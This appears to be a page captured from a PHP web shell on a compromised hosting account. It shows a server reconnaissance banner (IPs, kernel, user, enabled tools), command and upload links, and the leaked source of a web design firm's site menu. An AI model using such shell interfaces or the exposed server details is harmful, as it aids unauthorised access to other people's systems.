Server IP : 103.53.40.154 / Your IP : 18.220.97.161 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/thewebshop.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- menu start --> <?php $page_name=basename($_SERVER['PHP_SELF'],'.php'); ?> <style> .mega-menu .menu-links > li > a {font-size:15px !important;} </style> <nav id="menu-1" class="mega-menu"> <section class="menu-list-items"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12"> <ul class="menu-logo"> <li> <a href="http://www.thewebshop.co.in"><img id="logo_img" src="images/logo.png" alt="logo"> </a> <img src="images/google-partner.png" class="dsp-ptnr"> </li> </ul> <ul class="menu-links"> <li> <a href="http://www.thewebshop.co.in"> Home</a></li> <li> <a href="about-us.htm"> About Us</a></li> <li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">Our Services <span class="caret"></span></a> <ul class="dropdown-menu" role="menu"> <?php $header_ser_sql=db_query("select * from tbl_category where category_parent_id='0' and category_status='Active' order by category_order_by asc"); while($header_ser_res=mysqli_fetch_array($header_ser_sql)) {?> <li> <a href="<?=$header_ser_res['category_url']?>.html"> <?=$header_ser_res['category_name']?></a> </li> <?}?> </ul> </li> <?php $header_sql=db_query("select * from tbl_category where category_parent_id='0' and category_for_home='Yes' and category_status='Active' order by category_order_by asc limit 3"); while($header_res=mysqli_fetch_array($header_sql)) {?> <li> <a href="<?=$header_res['category_url']?>.html"> <?=$header_res['category_name']?></a> </li> <?}?> <?/* <li> <a href="web-designing.html"> Web Designing </a></li> <!--<li> <a href="javascript:void(0)">Home<i class="fa fa-angle-down fa-indicator"></i></a> <ul class="drop-down-multilevel"> <li><a href="index-2.html">Home One </a></li> <li><a href="index2.html">Home Two </a></li> <li><a href="index3.html">Home Three </a></li> </ul> </li>--> <li> <a href="development.html"> Development </a></li> <li> <a href="digital-marketing.html"> Digital Marketing </a></li> <!---<li><a href="internship"> Internship </a></li> <li><a href="enterprise-solutions.php"> Enterprise Solutions</a></li> <li><a href="bulksms.html"> Bulk SMS</a></li> <li><a href="#"> Training </a></li>--> */?> <li> <a href="packages.htm"> Our Packages</a></li> <li> <a href="contact.htm"> Contact Us </a></li> <li> <a href="terms-and-conditions.htm"> Terms And Conditions</a> </li> <li> <a href="portfolio.htm"> Portfolio</a> </li> <li> <a href="enquiry.htm"> Enquiry</a> </li> <!-- <li><a href="terms-and-conditions.html"> Terms & Conditions </a></li> --> <li class="hidden-xs" style="margin-left: 30px;"><img src="images/google-partner.png" style="width:130px;"></li> </ul> </div> </div> </div> </section> </nav>